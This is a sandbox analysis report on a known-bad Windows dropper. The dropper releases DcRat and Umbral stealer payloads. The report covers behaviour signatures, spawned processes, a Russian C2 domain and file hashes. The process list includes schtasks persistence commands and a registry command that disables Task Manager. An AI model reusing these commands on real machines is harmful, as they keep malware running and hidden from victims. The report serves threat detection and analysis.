Analysis Overview
SHA256
4174a9073fea7b22d8a973e2891d996b7d5b0eb94a85c538cd7da1a2c4c1e9c7
Threat Level: Known bad
The file 898a94f29edc228ce3bd2054f3d5d6dd.bin was found to be: Known bad.
Malicious Activity Summary
Umbral
Detect Umbral payload
DcRat
Process spawned unexpected child process
DCRat payload
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Disables Task Manager via registry modification
Checks computer location settings
Reads user/profile data of web browsers
Loads dropped DLL
Executes dropped EXE
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Drops file in Program Files directory
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Modifies registry key
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Creates scheduled task(s)
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Views/modifies file attributes
Detects videocard installed
Runs ping.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-05 01:28
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-05 01:28
Reported
2024-05-05 01:30
Platform
win7-20240221-en
Max time kernel
149s
Max time network
155s
Command Line
Signatures
DcRat
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
Umbral
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Disables Task Manager via registry modification
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\stealer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\чекер dc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Inject.exe | N/A |
| N/A | N/A | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| N/A | N/A | C:\Windows\inf\conhost.exe | N/A |
| N/A | N/A | C:\Windows\inf\conhost.exe | N/A |
| N/A | N/A | C:\Windows\inf\conhost.exe | N/A |
| N/A | N/A | C:\Windows\inf\conhost.exe | N/A |
| N/A | N/A | C:\Windows\inf\conhost.exe | N/A |
| N/A | N/A | C:\Windows\inf\conhost.exe | N/A |
| N/A | N/A | C:\Windows\inf\conhost.exe | N/A |
| N/A | N/A | C:\Windows\inf\conhost.exe | N/A |
| N/A | N/A | C:\Windows\inf\conhost.exe | N/A |
| N/A | N/A | C:\Windows\inf\conhost.exe | N/A |
| N/A | N/A | C:\Windows\inf\conhost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Windows Mail\de-DE\wininit.exe | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Program Files (x86)\Windows Mail\de-DE\56085415360792 | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\inf\conhost.exe | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File opened for modification | C:\Windows\inf\conhost.exe | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Windows\inf\088424020bedd6 | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\stealer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\inf\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\inf\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\inf\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\inf\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\inf\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\inf\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\inf\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\inf\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\inf\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\inf\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\inf\conhost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe
"C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe"
C:\Users\Admin\AppData\Local\Temp\stealer.exe
"C:\Users\Admin\AppData\Local\Temp\stealer.exe"
C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
"C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"
C:\Users\Admin\AppData\Local\Temp\Inject.exe
"C:\Users\Admin\AppData\Local\Temp\Inject.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat" "
C:\MsWinsessiondllNet\driverBrokercommon.exe
"C:\MsWinsessiondllNet\driverBrokercommon.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Windows\inf\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\inf\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Windows\inf\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Mail\de-DE\wininit.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\de-DE\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Mail\de-DE\wininit.exe'" /rl HIGHEST /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\UaJRNF11a2.bat"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\inf\conhost.exe
"C:\Windows\inf\conhost.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0a0a1e6e-5481-4639-ae8b-5fea2ac76621.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\93f16f6c-47c0-4cae-90c5-45b4dc351db8.vbs"
C:\Windows\inf\conhost.exe
C:\Windows\inf\conhost.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0cd5995c-5c03-4040-b512-619c1eccbcb3.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6244d727-ed45-43e8-ad89-3c478c88af5c.vbs"
C:\Windows\inf\conhost.exe
C:\Windows\inf\conhost.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d78b4399-8139-4837-973a-f2f0f90fe745.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5ac14dba-f1e7-43c2-8a6c-dda8c9a7323c.vbs"
C:\Windows\inf\conhost.exe
C:\Windows\inf\conhost.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9e1306a1-7d80-41d9-a54a-66f1727dc77c.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d5150883-ed23-4482-a854-c5a2a66d82ea.vbs"
C:\Windows\inf\conhost.exe
C:\Windows\inf\conhost.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2b170f59-441c-4133-a8dc-1297c5cdbc6a.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b02fd538-2945-43e5-a920-0034d7675f77.vbs"
C:\Windows\inf\conhost.exe
C:\Windows\inf\conhost.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c1b0d6d0-77d3-4654-9345-549cd621ce7f.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e7714cb1-5e00-45fe-a1f0-ae5b007ec77b.vbs"
C:\Windows\inf\conhost.exe
C:\Windows\inf\conhost.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7b4f4761-f16f-4de3-b5fb-0923ce7bdfea.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ae17c003-b5fe-4f4f-be48-34d5b9eac8fe.vbs"
C:\Windows\inf\conhost.exe
C:\Windows\inf\conhost.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\39f25686-6a3e-4eda-875d-a5be55c4b30d.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dd645dac-b7c5-44f9-a4a4-3ff1610dd827.vbs"
C:\Windows\inf\conhost.exe
C:\Windows\inf\conhost.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9c5e5929-4054-4c15-bacf-e767c8424da0.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\51387e81-ee66-446b-a46a-d0e3ed1d0595.vbs"
C:\Windows\inf\conhost.exe
C:\Windows\inf\conhost.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\54d1267b-f558-4723-a5e9-e5e7f7b12168.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6139caac-670c-420e-a75c-fa399d21bd69.vbs"
C:\Windows\inf\conhost.exe
C:\Windows\inf\conhost.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e2128f3e-4b1b-4b82-b696-70ee170e0496.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\799571d0-feee-4ef0-a2bd-927a43a01780.vbs"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 216.58.201.99:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | a0947008.xsph.ru | udp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
Files
memory/2892-0-0x0000000000400000-0x000000000084E000-memory.dmp
\Users\Admin\AppData\Local\Temp\stealer.exe
| MD5 | 8cc1e7cf94fec9bc505ce7411aa28861 |
| SHA1 | 08703de84f3db427c368f16c873664d78bd83264 |
| SHA256 | cc60087c94ea0ab843dcae2cdd76ac5e9c90599d2909bbba12881babf46158ba |
| SHA512 | fe60f11452c9e470c0b63385cf0ee8f9fd07598c1294ba25cc8c7c093142efe865aba39680ae5f80611db9423717a7094c939f180e5195e7ae91a9633872a423 |
\Users\Admin\AppData\Local\Temp\чекер dc.exe
| MD5 | 6216b6bef94c09a40bfa263809b1ae56 |
| SHA1 | a928120e65199c6aaae6c991aa0466f3f8b06020 |
| SHA256 | eabc7e4491961469ccb9c8cd716dbaf5285ecb8ad3edfc6bfec133a1ec80f05b |
| SHA512 | 0e311738b5bdf73f01c552b59646485418ab5b99862af5da2bb934d4262307ac8f57274bbd7f6c99376e6be99d424aad5282a73a063529310425666be224d215 |
memory/2508-14-0x00000000013E0000-0x0000000001420000-memory.dmp
\Users\Admin\AppData\Local\Temp\Inject.exe
| MD5 | d428ddd1b0ce85a6c96765aeaf246320 |
| SHA1 | d100efdaab5b2ad851fe75a28d0aa95deb920926 |
| SHA256 | 453a331db812ed6e0ce6cca5d3b5be26e66c44b5f6fbdc88f98442670b8daecb |
| SHA512 | 3f9dda9d998ef282eb31644296ef0617bbf40352189f4ccd744191f466e932ffde2fd2bdaebe89f0bc06e465d57a8e46e08b3001fe834b3d989fc71125d25899 |
memory/2892-20-0x0000000004980000-0x00000000049AA000-memory.dmp
memory/2964-25-0x000000013F9D0000-0x000000013F9FA000-memory.dmp
C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe
| MD5 | 7c9bb5fda146efee5ee4a243d6e404b0 |
| SHA1 | c2fb82a9efb3a2469e6a120ac4781a7fe26eb3dd |
| SHA256 | 1d4b4c4da6c16a2701cec1c24ff21168d26d4f81c0ac8b3e30ed01b8468d488b |
| SHA512 | 797e74b283e74a3282223d8035408d55269e4451a289e3873ea197624985121c87dccdbdef42ff99fd8b4d1fd7e856388444e3fc699a9d6b061499682a043771 |
C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat
| MD5 | ea70d7b0f1a8a1ff2d246efbdcfe1001 |
| SHA1 | 252e762aee8fcc5761e17bb84aa3af8276852f5c |
| SHA256 | 1947411b5329e6db696c2354b56290b82aaf58b5f5d75fd4f3315fbe27999e31 |
| SHA512 | 1fd28c415177644e069ded3e0ab3d27105fdac2d76f1060abb127e1961f310c81559e4c1213e61a7f32583cee9f4560106cafc88f0f20cf470edb756aadbec86 |
C:\MsWinsessiondllNet\driverBrokercommon.exe
| MD5 | d84e590c3715c79dc5b92c435957d162 |
| SHA1 | 2901580903e4b356448d9fe7bea510261e655363 |
| SHA256 | d81c1097d231fdcb536974ef025f230d1c4091bab3edcf4f9da9344b44b638ba |
| SHA512 | b797cdb43776a7e8a19f9c93299857d8f88651e13c7ba5ddb57f0ac0b24c7b98e6cc6c20ae1561948fb49774edad31cd237f40c9c690d34923ffee56bc02a485 |
memory/1652-37-0x00000000010E0000-0x000000000132A000-memory.dmp
memory/1652-38-0x0000000000140000-0x0000000000148000-memory.dmp
memory/1652-39-0x0000000000150000-0x0000000000158000-memory.dmp
memory/1652-40-0x0000000000190000-0x00000000001A0000-memory.dmp
memory/1652-41-0x00000000003F0000-0x0000000000446000-memory.dmp
memory/1652-42-0x0000000000170000-0x000000000017C000-memory.dmp
memory/1652-44-0x0000000000630000-0x000000000063C000-memory.dmp
memory/1652-43-0x00000000001A0000-0x00000000001AC000-memory.dmp
memory/1652-45-0x0000000000640000-0x0000000000648000-memory.dmp
memory/1652-46-0x0000000000650000-0x000000000065A000-memory.dmp
memory/1652-47-0x0000000000B00000-0x0000000000B0E000-memory.dmp
memory/1652-48-0x0000000000B10000-0x0000000000B18000-memory.dmp
memory/1652-49-0x0000000000B20000-0x0000000000B2A000-memory.dmp
memory/1652-50-0x0000000000BB0000-0x0000000000BBC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\UaJRNF11a2.bat
| MD5 | f7d10cf8a502ea71bc4cf2823a716694 |
| SHA1 | 1a03facad61a8d1b448da90c60aa10b2ec73125a |
| SHA256 | e2aa65fb4d4586edde781afee4a2c45456983110fecf37800b48ca47921a6c71 |
| SHA512 | 53df9b650686d54d3e80c1a416b98e9353a89a09d3e4884212ab42a2dced1f0b400f76afc298d1d868c5504736de7ab4694a408c12358d295242937a4547d09c |
memory/2460-62-0x0000000001160000-0x00000000013AA000-memory.dmp
memory/2460-63-0x000000001A8C0000-0x000000001A916000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\0a0a1e6e-5481-4639-ae8b-5fea2ac76621.vbs
| MD5 | 54a4ab02c1f992df21647e3a4b609dc5 |
| SHA1 | 933dfdeb84d9634a6c29605a5b445b9769ad7beb |
| SHA256 | 45919df7cf84c7ef28302c045d59dc8ca5f77e79d70d1b1f85d1e524b70f5a1a |
| SHA512 | fc32ad4184906f96c4562c1544644c7c17901ce058030a6894d15639d93b73b9cf7d2a94acb0641a0c06089ceb990543cb359de3e3b420ee6622725542946b9f |
C:\Users\Admin\AppData\Local\Temp\93f16f6c-47c0-4cae-90c5-45b4dc351db8.vbs
| MD5 | 8abcd2ae172afeb4ff08339b8fcffc25 |
| SHA1 | c19f781edabe30c1d1fbf2bb7cc970456eacd060 |
| SHA256 | 1e5334f0d108336af7b8d597f3937ceb35a057922ace5b3e61e45a6cf48e0a6b |
| SHA512 | 2876bb2c9f8ac0aeb72f0bba3f907ed3dba9e5322cd28d8875d55a6a784e80d4bc032582b5977811bd6db659887e8397cca7f1aef603ec8b974936196313605f |
C:\Users\Admin\AppData\Local\Temp\0cd5995c-5c03-4040-b512-619c1eccbcb3.vbs
| MD5 | 033de561bdc7c0ca00ad0401bb082688 |
| SHA1 | 2e8f6980e6b56f46c045a55803efb854595df75c |
| SHA256 | 3dc818abd994a8ef72851ff07a297b8cd5cfdb9b5fefd67328a8927985b7da5a |
| SHA512 | 61c4b381627f40b831a08cbf5b57245c720791bf693b378ca929731522847d68d6455047735fce7a590b769dcd1414dc2169e9ac1214a3dd4a778a580d2dba8c |
C:\Users\Admin\AppData\Local\Temp\d78b4399-8139-4837-973a-f2f0f90fe745.vbs
| MD5 | 9ae89897944358d29f5cffdc7ae53012 |
| SHA1 | ac33a9b6cf573f9af6b47b488a7aef5f5a6a90d7 |
| SHA256 | f90b4075a640a9f6e66fd66a99e12cc0b28d5a3dd7481a94538e4adfb52fed57 |
| SHA512 | a062d88a1cc77a451e251a8225c2d5fb3985a14390eeb1cbfd927c4eabc69c259cd267b58c70fd6462f6269f05fce35c992e5d439c2c49fc688fb6b16954befe |
C:\Users\Admin\AppData\Local\Temp\9e1306a1-7d80-41d9-a54a-66f1727dc77c.vbs
| MD5 | e6be198e9b7e5ce620d555dd8c3ffcf0 |
| SHA1 | 4a172a1ae35f9a8cd67943c9981612467d3d45c8 |
| SHA256 | 7c097f6b2f439250559ea809c39f4bdff6acb0ee7a172aaa26d2d7a6aa5245ae |
| SHA512 | fb542d4cc53e0468211623a8b37930f9b889fec67458cf17c3e67282f2814de916705996d2663fa3e2ce1f51269e413771ceeb524f644eda09c0f6d4747cdea6 |
C:\Users\Admin\AppData\Local\Temp\2b170f59-441c-4133-a8dc-1297c5cdbc6a.vbs
| MD5 | 6febe70bd4b9501ff665cbdc618847c5 |
| SHA1 | 8840b48e3ef3baea97cf136db5020255a96e71fa |
| SHA256 | 65970a84b910cd3e31c2bd70c919c6c82bd47b6b0e590df373ca10a0f2fe8f72 |
| SHA512 | 1da13ac7bee6e3dbef7d9088449033483b17c0b2765be7c33defc945185c4ff402febe3d7498c2aef859ac01dd2b136e1e7531632bf0c6ebf93db01fd48342fa |
C:\Users\Admin\AppData\Local\Temp\c1b0d6d0-77d3-4654-9345-549cd621ce7f.vbs
| MD5 | d6c220096df3c66a29f927f521da8e5f |
| SHA1 | 572d59a219f371433f29b5a1d10f45193cffba20 |
| SHA256 | e17e34086e8e29048ccadf5e5ea9bf57643d6f834b380086e623c92dd23af439 |
| SHA512 | 8351d2c62e13732494b9979bd7a563cf88e1c7ccc0896adaef32ee5fff4ae758c998aaf413292124a8d46f5bdfaa9c7e519de03093091107c0683b93510ddbc2 |
memory/2336-129-0x0000000000610000-0x0000000000666000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7b4f4761-f16f-4de3-b5fb-0923ce7bdfea.vbs
| MD5 | 11cbace0608b5facaec85f9ab63a2743 |
| SHA1 | 071f69516a7bb9d86edeae73d13b72a3ced7abdd |
| SHA256 | a038ca5a1d89a8b89fbdce7c537dde8c878644cb4a509bac4e7386945c4bb713 |
| SHA512 | dc18040ec489320b1e060ad2ae8ca3d148812e88e99a38967b49b23e57d91c0e42d1943c5bbce6800dbb7ad10e042dd0a9bb64772fd9ed8d18e8399b632e6021 |
memory/1696-141-0x00000000000C0000-0x000000000030A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\39f25686-6a3e-4eda-875d-a5be55c4b30d.vbs
| MD5 | 5ee3bd681f680cdc5518b286570b28c2 |
| SHA1 | d86da3820b4d08031f5f263e727eb12c0881bea1 |
| SHA256 | 3ab21a3c8c8b8584c7d35ab76d6556fe281666bee0880baef4490a719a56b989 |
| SHA512 | 77585d574d8dcc0fa257c5cd11b38b0f616e74726cc4a3fd6f11d99e19ce9f3e38f6521ef43ea61d3ea59223101c2f067853a046c4edda3f9dfcf2113d557e96 |
memory/1436-153-0x00000000011F0000-0x000000000143A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\9c5e5929-4054-4c15-bacf-e767c8424da0.vbs
| MD5 | 4b6b46eab9c52b28d9814e7abd31baaf |
| SHA1 | bafcefe324854d398d6f8bb506d593f59a72c3bf |
| SHA256 | 58c2bb82bf82371de06c2d3a7cad22c24e5f9e4bd94f4bf415436d5b1cc2f395 |
| SHA512 | 24b6981da8cde1d9be8ddad6e5feb7c9e2a4f1b90cf2c84f5f7f4393cefcfe70a70801e16ed5aa26b008907608280297aeb565c993e7590d2149c93dbe693692 |
C:\Users\Admin\AppData\Local\Temp\54d1267b-f558-4723-a5e9-e5e7f7b12168.vbs
| MD5 | dcee4dce741bd20ca0db644c2c5e46e7 |
| SHA1 | 11db5b4398b3f46aee65d3381bde7ba7143c22d6 |
| SHA256 | 6d725edfb7ccbf27477df652f4334171a691e9c731681c805a7d84ebd9269177 |
| SHA512 | 24efe9c8faea46acf6d3f5692ad6fb1292fd065e87196ca7cf4b46eec1ce17619936cb81a053b289ca7451e32b83f139dd12554497ef8374628fdc563907553d |
C:\Users\Admin\AppData\Local\Temp\e2128f3e-4b1b-4b82-b696-70ee170e0496.vbs
| MD5 | ee5ef58333c9ac975005e403469f5ad9 |
| SHA1 | 9ce58c735d017f14510772fb4d44528177509c59 |
